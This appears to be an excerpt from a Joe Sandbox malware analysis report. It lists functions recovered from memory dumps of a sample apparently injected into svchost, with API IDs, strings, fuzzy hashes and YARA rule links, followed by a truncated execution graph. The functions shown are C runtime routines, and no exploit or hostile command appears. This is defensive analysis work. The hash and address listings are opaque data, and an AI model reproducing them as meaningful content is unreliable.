                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: D7F01C75718B8482FA94CF53B91C11DBE65AB89FD0F089131EE4A67B18DF7DC4458B02
                                                        Function 0000026A879CBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 3b089b17eef97f58e315832727781e6d96eaf58a468135795a3cb71de5b836e2
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 19F06271211A0481EF50CF29E44C35D7F20EB867A5F940219DA6A571E4DF2EC544CB02
                                                        Function 0000026A879C50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: e84d3f95ef50d0da7100aa3763a05495aa81dff1962d31d5224108d669eafd74
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: EF02B632219B8486EBA0CB59E49875EB7A1F3D4794F204015EB8E97BA9DF7DC484CF01
                                                        Function 0000026A879C5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 67d3c669d68eaeb62026641d81c2ba8ade1a21c8528e3319f6dd4d7c6ecb65f5
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: EE61EA36519B44C6EBA0DB15E54832EB7A0F3D8784F600115FA8E57BA8DB7EC580CF02
                                                        Function 0000026A879D4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 951121f1d836c29066c475965dea384ba1a895c4e71a86b8b5a2b369afc9a8fb
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: FC117036A10A9131FAE4D568E85E36D3D516B783F8F280724AD76376F6CA2AC8414E03
                                                        Function 0000026A879A3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: aeaa6a3608324816b59301e751e5f347b5c67f5421315ed83d7c14011e8581c2
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 9711C232A12F1111FEE4152CE85E36DB9D06B58374F48A738AD7E277E6CA2AC8415E02
                                                        Function 0000026A8799F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: eebbbc8525f68246a3b0a6a29bd4a3cb681badd0c78307970aab721f545df6c1
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 4861D372604640C2FAF9CB68E54C36EBAA2F785784F544425CA1A377A4DB37C885CF43
                                                        Function 0000026A879CAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 91175b491b7fc14e3f1a7658fd3bfdb3fb1216593f4870ebf483384664c1c76e
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 26619D33A00B84CAEB60DF65D48439D7BA1F398BACF084215EF4927B98DB39C595CB41
                                                        Function 0000026A879CAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 893e4d8dc827b760fc59cebf5f18d00e76e891684a4649e14e6d9b3ac1800f38
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 2D51BF72100380CAEFB48F65958835D77A4F3D5BA5F188216EB8967BD5CB3AD490DF02
                                                        Function 0000026A8799A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 24b885a40865372f2d4962931c6dd4c13311282acb065aa2b8f2b100d7f859d2
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: A251A032100380CAFBF48F25954839C77A0F355BA4F189216DB99A7BD5CB3AD490DF02
                                                        Function 0000026A87998405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 8bc6e4c2ed6fb3d0b116afd45bb950e03d86cb73ff22765c23392437f1fb0b44
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 8051DD327122009BFB94CF15E488F1C37A9F354B98F568168DA0A67788EB36D885CF07
                                                        Function 0000026A879983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 6434e668c18de7f899a849f0e788a6f9301be5892d0fc4d1102cc1fdd749815e
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: A1319C32211740AAF794DF11E888F1D77A9F740B98F568018EE5B67788DB3AC945CB06
                                                        Function 0000026A879D2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 3076751dc3de790d1c224386df8ee1f4e5ab8c71f6f65ab3a3bed05673c9e6dc
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 88D10132B14A8089EB51CFB9D4483AC3FB1F754BD8F108216DE5DA7B99DA3AC446CB41
                                                        Function 0000026A879C14A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: 8a01ecca636f93bdf911fe9301806ba74427497ad84442dbc2d131ee4094cafd
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: 9F115B76604A91D6E794DFA6A80814D7FA0FB8AFC5F084025EA4963716EE39C451CB41
                                                        Function 0000026A879D2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: a659f95e0478c9a379e7c93a59f58379ea217171002cffd52b577c1c22c3c908
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 9391D032700A5085FBA0DF7594883AD3FA0F759B98F644109DE4A77A94DB7EC8C2CB02
                                                        Function 0000026A879C7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 4e80524f35fcef7bad59f85813724d52d64db0f3f33ffe74409acc95bda1e77e
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: A4115A32710F018AEB90DF60E8583AC37B4F31A758F440E21EA6D537A4EB78C1988780
                                                        Function 0000026A879C253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 97ea5c88fb40b65250efba85239deb6fe808c8ef7dc44d6fea174178200e4e45
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: E671B636200B8186EFB5DF25D8993AE77A4F3C9B84F550026DD0963B89DE36D685CB02
                                                        Function 0000026A87999E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: e083ef4e6a99dc2faf5a08287110857988fabb0183ff147dc1fcf3667f8f1dd1
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 33618B33A05B848AFBA0DFA5D48439D77B0F398B98F044215EF4927B98DB3AD595CB01
                                                        Function 0000026A879C2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: a2f76bc1a186076cee4736489c3d4438f40eba79840f7ba633a66ebf323134d9
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: EA51C43220478182FFB4DB2AA45C3AEBB91F3D5780F450125DE5A27B99DA3BC585CF42
                                                        Function 0000026A879D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 5c34eae6179e8718e065711947d23fa5df45d25b207243dff04b03615aa00afe
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 8541A433715A8086DBA0DF25E8483ADBFA1F798794F944021EE4D97794EB7DC441CB41
                                                        Function 0000026A879C94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 516278ab517d9276ea0f4953800809262020678c9f6335137ecd7ce881f65308
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 3D112836214B8082EBA18B15E44835DBBE5FB99BA4F584225EF8C17B68DF3DC551CB00
                                                        Function 0000026A87997356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 290368697319c93d0959a6d4aceff4e73c937a6d0c9df6ff90baa51795892e9d
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: CFE08671741B4490DF418F21E88469C73A1DBA8B64F889122995C1B311FA38D1E9C702
                                                        Function 0000026A879973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 57ea791ecea9af06e65d832b1adcba3d40aeefbf742ffe7567ba952dade77035
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 19E08671701B4490DF418F21E48069C7361E7A8B54F889122C94C1B311EA38D1E5C701
                                                        Function 0000026A879C1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 7016fa5795a79e5502fdc21d921c24760b1a256b601511705076004f3255fffb
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: A8119175641B4482EE94DF66A40C22D7BA1FBCAFC0F184025EE4D63766EF3AC442C741
                                                        Function 0000026A879C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: b1c6b37d2b3670007f77e6ad3635e51a98d0f2eb219863f2620388776d6560d5
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 08E06D3560160486EB44CFA2D80C34E3EE1FB8AF86F04C024C90907351DF7EC499CB51

                                                        Execution Graph

                                                        Execution Coverage:0.8%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:471
                                                        Total number of Limit Nodes:3
                                                        execution_graph 14923 179537ac0e4 14924 179537ac0fd 14923->14924 14925 179537ac0f9 14923->14925 14938 179537aec90 14924->14938 14930 179537ac11b 14969 179537ac158 14930->14969 14931 179537ac10f 14964 179537ad744 14931->14964 14935 179537ad744 __free_lconv_num 5 API calls 14936 179537ac142 14935->14936 14937 179537ad744 __free_lconv_num 5 API calls 14936->14937 14937->14925 14939 179537ac102 14938->14939 14940 179537aec9d 14938->14940 14944 179537af1ec GetEnvironmentStringsW 14939->14944 14988 179537acefc 14940->14988 14942 179537aeccc 15005 179537ae968 14942->15005 14945 179537ac107 14944->14945 14946 179537af21c 14944->14946 14945->14930 14945->14931 14947 179537af10c WideCharToMultiByte 14946->14947 14948 179537af26d 14947->14948 14949 179537af274 FreeEnvironmentStringsW 14948->14949 14950 179537aca0c 5 API calls 14948->14950 14949->14945 14951 179537af287 14950->14951 14952 179537af298 14951->14952 14953 179537af28f 14951->14953 14955 179537af10c WideCharToMultiByte 14952->14955 14954 179537ad744 __free_lconv_num 5 API calls 14953->14954 14956 179537af296 14954->14956 14957 179537af2bb 14955->14957 14956->14949 14958 179537af2c9 14957->14958 14959 179537af2bf 14957->14959 14960 179537ad744 __free_lconv_num 5 API calls 14958->14960 14961 179537ad744 __free_lconv_num 5 API calls 14959->14961 14962 179537af2c7 FreeEnvironmentStringsW 14960->14962 14961->14962 14962->14945 14965 179537ad749 HeapFree 14964->14965 14966 179537ad77a 14964->14966 14965->14966 14967 179537ad764 __vcrt_InitializeCriticalSectionEx __free_lconv_num 14965->14967 14966->14925 14968 179537ad6ac __free_lconv_num 4 API calls 14967->14968 14968->14966 14970 179537ac17d 14969->14970 14971 179537ad6cc _invalid_parameter_noinfo 5 API calls 14970->14971 14984 179537ac1b3 14971->14984 14972 179537ac1bb 14973 179537ad744 __free_lconv_num 5 API calls 14972->14973 14974 179537ac123 14973->14974 14974->14935 14975 179537ac22e 14976 179537ad744 __free_lconv_num 5 API calls 14975->14976 14976->14974 14977 179537ad6cc _invalid_parameter_noinfo 5 API calls 14977->14984 14978 179537ac21d 15455 179537ac268 14978->15455 14982 179537ad744 __free_lconv_num 5 API calls 14982->14972 14983 179537ac253 14985 179537ad590 _invalid_parameter_noinfo 10 API calls 14983->14985 14984->14972 14984->14975 14984->14977 14984->14978 14984->14983 14986 179537ad744 __free_lconv_num 5 API calls 14984->14986 15446 179537ac6e8 14984->15446 14987 179537ac266 14985->14987 14986->14984 14989 179537acf28 FlsSetValue 14988->14989 14990 179537acf0d FlsGetValue 14988->14990 14991 179537acf35 14989->14991 14994 179537acf1a 14989->14994 14992 179537acf22 14990->14992 14990->14994 15028 179537ad6cc 14991->15028 14992->14989 14994->14942 14996 179537acf62 FlsSetValue 14999 179537acf80 14996->14999 15000 179537acf6e FlsSetValue 14996->15000 14997 179537acf52 FlsSetValue 14998 179537acf5b 14997->14998 15001 179537ad744 __free_lconv_num 5 API calls 14998->15001 15032 179537acb94 14999->15032 15000->14998 15001->14994 15004 179537ad744 __free_lconv_num 5 API calls 15004->14994 15175 179537aebd8 15005->15175 15010 179537ae9ba 15010->14939 15013 179537ae9d3 15014 179537ad744 __free_lconv_num 5 API calls 15013->15014 15014->15010 15015 179537ae9e2 15015->15015 15194 179537aed0c 15015->15194 15018 179537aeade 15019 179537ad6ac __free_lconv_num 5 API calls 15018->15019 15021 179537aeae3 15019->15021 15020 179537aeb39 15027 179537aeba0 15020->15027 15205 179537ae498 15020->15205 15022 179537ad744 __free_lconv_num 5 API calls 15021->15022 15022->15010 15023 179537aeaf8 15023->15020 15024 179537ad744 __free_lconv_num 5 API calls 15023->15024 15024->15020 15026 179537ad744 __free_lconv_num 5 API calls 15026->15010 15027->15026 15031 179537ad6dd _invalid_parameter_noinfo 15028->15031 15030 179537acf44 15030->14996 15030->14997 15031->15030 15036 179537ad6ac 15031->15036 15033 179537acc46 _invalid_parameter_noinfo 15032->15033 15055 179537acaec 15033->15055 15035 179537acc5b 15035->15004 15039 179537acfa0 15036->15039 15038 179537ad6b5 15038->15030 15042 179537acfb5 __vcrt_InitializeCriticalSectionEx 15039->15042 15040 179537acfe1 FlsSetValue 15041 